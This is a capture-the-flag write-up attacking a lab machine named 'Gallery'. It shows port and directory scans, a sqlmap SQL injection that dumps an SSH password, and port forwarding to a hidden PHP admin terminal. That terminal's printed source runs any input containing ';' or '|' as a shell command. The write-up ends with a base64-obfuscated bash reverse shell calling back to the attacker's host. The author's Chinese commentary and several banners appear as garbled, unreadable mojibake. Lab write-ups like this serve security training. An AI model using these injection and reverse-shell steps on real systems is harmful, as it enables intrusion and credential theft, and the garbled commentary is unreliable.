Box Info
| OS | Linux |
|---|---|
| Difficulty | Hard |
Nmap
[root@kali] /home/kali/Gallery
โฏ nmap 172.17.0.3 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 19:95:1a:f2:f6:7a:a1:f1:ba:16:4b:58:a0:59:f2:02 (ECDSA)
|_ 256 e7:e9:8f:b8:db:94:c2:68:11:4c:25:81:f1:ac:cd:ac (ED25519)
80/tcp open http PHP cli server 5.5 or later (PHP 8.3.6)
|_http-title: Galer\xC3\xADa de Arte Digital
Feroxbuster
[root@kali] /home/kali/Gallery
โฏ feroxbuster -u 'http://172.17.0.3/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ๐ค ver: 2.11.0
โโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ Target Url โ http://172.17.0.3/
๐ Threads โ 50
๐ Wordlist โ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
๐ Status Codes โ All Status Codes!
๐ฅ Timeout (secs) โ 7
๐ฆก User-Agent โ feroxbuster/2.11.0
๐ Config File โ /etc/feroxbuster/ferox-config.toml
๐ Extract Links โ true
๐ฒ Extensions โ [php, txt]
๐ HTTP methods โ [GET]
๐ Recursion Depth โ 4
โโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโ
๐ Press [ENTER] to use the Scan Management Menuโข
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
200 GET 29l 83w 1478c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 7l 57w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 266l 543w 5288c http://172.17.0.3/style.css
200 GET 28l 63w 1104c http://172.17.0.3/login.php
200 GET 0l 0w 0c http://172.17.0.3/config.php
302 GET 0l 0w 0c http://172.17.0.3/dashboard.php => login.php
SQL Injection
ๅจ็จๆทๅ่ฟ้ๅญๅจๆณจๅ ฅ็น
่ฟๅ ฅๅฐๅๅฐ๏ผๅๆไธไธชๅฏไปฅๆ็ดข็ๆณจๅ ฅ็น
่ฟ้ไฝฟ็จsqlmap่ฟ่กๆณจๅ ฅ
[root@kali] /home/kali/Gallery
โฏ sqlmap --cookie "PHPSESSID=r3kjodvf4kl5q91uisobojp527" -u "http://172.17.0.3/dashboard.php?search_term=11" -D secret_db --dump
___
__H__
___ ___[.]_____ ___ ___ {1.9.2#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:49:59 /2025-04-25/
[22:49:59] [INFO] resuming back-end DBMS 'mysql'
[22:49:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_term (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: search_term=11' AND EXTRACTVALUE(2694,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(2694=2694,1))),0x71626a6271)) AND 'kDVa'='kDVa
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search_term=11' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x4e4442547641624446444143786472586d5563504c714842634f75726647705072656368454a4575,0x71626a6271),NULL-- -
---
[22:49:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.3.6
back-end DBMS: MySQL >= 5.1
[22:49:59] [INFO] fetching tables for database: 'secret_db'
[22:49:59] [INFO] fetching columns for table 'secret' in database 'secret_db'
[22:49:59] [INFO] fetching entries for table 'secret' in database 'secret_db'
Database: secret_db
Table: secret
[1 entry]
+----+------------------------+-----------+
| id | ssh_pass | ssh_users |
+----+------------------------+-----------+
| 1 | $uper$ecretP4$$w0rd123 | sam |
+----+------------------------+-----------+
[22:50:00] [INFO] table 'secret_db.secret' dumped to CSV file '/root/.local/share/sqlmap/output/172.17.0.3/dump/secret_db/secret.csv'
[22:50:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.3'
[*] ending @ 22:50:00 /2025-04-25/
ๅพๅฐsam็็ปๅฝๅฏ็
Root
ไธไผ fscanๆฅ็็ซฏๅฃๆ ๅต๏ผshadow1ng/fscan: ไธๆฌพๅ ็ฝ็ปผๅๆซๆๅทฅๅ ท๏ผๆนไพฟไธ้ฎ่ชๅจๅใๅ จๆนไฝๆผๆซๆซๆใ
sam@7adf2cce45b2:/tmp$ ./fscan -h 127.0.0.1
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ___ _ โ
โ / _ \ ___ ___ _ __ __ _ ___| | __ โ
โ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / โ
โ / /_\\_____\__ \ (__| | | (_| | (__| < โ
โ \____/ |___/\___|_| \__,_|\___|_|\_\ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Fscan Version: 2.0.0
[2025-04-26 04:53:51] [INFO] ๆดๅ็ ด่งฃ็บฟ็จๆฐ: 1
[2025-04-26 04:53:51] [INFO] ๅผๅงไฟกๆฏๆซๆ
[2025-04-26 04:53:51] [INFO] ๆ็ปๆๆไธปๆบๆฐ้: 1
[2025-04-26 04:53:52] [INFO] ๅผๅงไธปๆบๆซๆ
[2025-04-26 04:53:52] [INFO] ๆๆ็ซฏๅฃๆฐ้: 233
[2025-04-26 04:53:52] [SUCCESS] ็ซฏๅฃๅผๆพ 127.0.0.1:3306
[2025-04-26 04:53:52] [SUCCESS] ็ซฏๅฃๅผๆพ 127.0.0.1:22
[2025-04-26 04:53:52] [SUCCESS] ็ซฏๅฃๅผๆพ 127.0.0.1:8888
[2025-04-26 04:53:52] [SUCCESS] ็ซฏๅฃๅผๆพ 127.0.0.1:80
[2025-04-26 04:53:52] [SUCCESS] ๆๅก่ฏๅซ 127.0.0.1:3306 => [mysql] ็ๆฌ:8.0.41-0ubuntu0.24.04.1 ไบงๅ:MySQL Banner:[[.8.0.41-0ubuntu0.24.04.1.^.K`y.3v<L.= d.@79xl1 caching_sha2_password]
[2025-04-26 04:53:52] [SUCCESS] ๆๅก่ฏๅซ 127.0.0.1:22 => [ssh] ็ๆฌ:9.6p1 Ubuntu 3ubuntu13.9 ไบงๅ:OpenSSH ็ณป็ป:Linux ไฟกๆฏ:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.9.]
[2025-04-26 04:53:57] [SUCCESS] ๆๅก่ฏๅซ 127.0.0.1:8888 => [http]
[2025-04-26 04:53:57] [SUCCESS] ๆๅก่ฏๅซ 127.0.0.1:80 => [http]
[2025-04-26 04:53:57] [INFO] ๅญๆดป็ซฏๅฃๆฐ้: 4
[2025-04-26 04:53:57] [INFO] ๅผๅงๆผๆดๆซๆ
ๅฐ8888็ซฏๅฃ่ฝฌๅๅบๆฅ
[root@kali] /home/kali/Gallery
โฏ ssh sam@172.17.0.3 -L 8888:127.0.0.1:8888
ๆฅ็็ฝ้กตๆบ็
sam@7adf2cce45b2:/var/www/terminal$ cat index.php
<?php
session_start();
if ($_SERVER['SERVER_ADDR'] !== '127.0.0.1' && $_SERVER['REMOTE_ADDR'] !== '127.0.0.1') {
die('Access Denied');
}
$header = "
______ _ _
/ ____/___ _/ / /__ _______ __
/ / __/ __ `/ / / _ \/ ___/ / / /
/ /_/ / /_/ / / / __/ / / /_/ /
\____/\__,_/_/_/\___/_/ \__, /
/____/
Gallery Management System v1.0
--------------------------------
[?] Try thinking outside the box
";
$output = isset($_POST['command']) ? '' : $header;
$commands = ['help', 'list_art', 'show_artists', 'check_status', 'view_logs', 'system_info'];
if (isset($_POST['command'])) {
$cmd = $_POST['command'];
if ($cmd === 'help') {
$output = "Available commands:\n";
$output .= "----------------\n";
foreach ($commands as $command) {
$output .= "- $command\n";
}
$output .= "\nGallery Management System - Admin Interface";
} else if ($cmd === 'list_art') {
$output = "Current Artworks:\n";
$output .= "- La noche estrellada (ID: 1)\n";
$output .= "- Mona Lisa (ID: 2)\n";
$output .= "Status: Display Only Mode";
} else if ($cmd === 'show_artists') {
$output = "Registered Artists:\n";
$output .= "- Vincent van Gogh\n";
$output .= "- Leonardo da Vinci\n";
$output .= "Access Level: Read Only";
} else if ($cmd === 'check_status') {
$output = "Gallery System Status:\n";
$output .= "- Database: Connected\n";
$output .= "- Backup: Enabled\n";
$output .= "- Security: Enhanced\n";
$output .= "- Last Check: " . date("Y-m-d");
} else if ($cmd === 'view_logs') {
$output = "Recent Activity:\n";
$output .= "- [INFO] System startup\n";
$output .= "- [WARN] Failed login attempt\n";
$output .= "- [INFO] New artwork added\n";
$output .= "Access: Restricted";
} else if ($cmd === 'system_info') {
$output = "Gallery Management System\n";
$output .= "Version: 1.0\n";
$output .= "Environment: Production\n";
$output .= "Access Level: Guest";
} else if (strpos($cmd, ';') !== false || strpos($cmd, '|') !== false) {
// Aquรญ es donde realmente ejecutamos comandos
$output = shell_exec($cmd);
} else {
$output = "Command not found. Type 'help' for available commands.";
}
$output = $header . "\n" . $output;
}
?>
ๅ็ฐๅช้่ฆๅญๅจๅๅทๆ่ ๅผๅท๏ผๅฐฑๅฏไปฅๆง่กๅฝไปค
โค docker0 โ 172.17.0.1:4444
printf KGJhc2ggPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS80NDQ0IDA+JjEpICY=|base64 -d|bash
Summary
User๏ผsqlๆณจๅ
ฅๆฟๅฐ็จๆท็ปๅฝๅฏ็
Root๏ผๅๆๆบ็ ๏ผ่ฟ่กๅฝไปคๆง่ก
ๆ่งๅพ่ฟไธชๆบๅจๅบ่ฏฅ็ฎeasy้พๅบฆ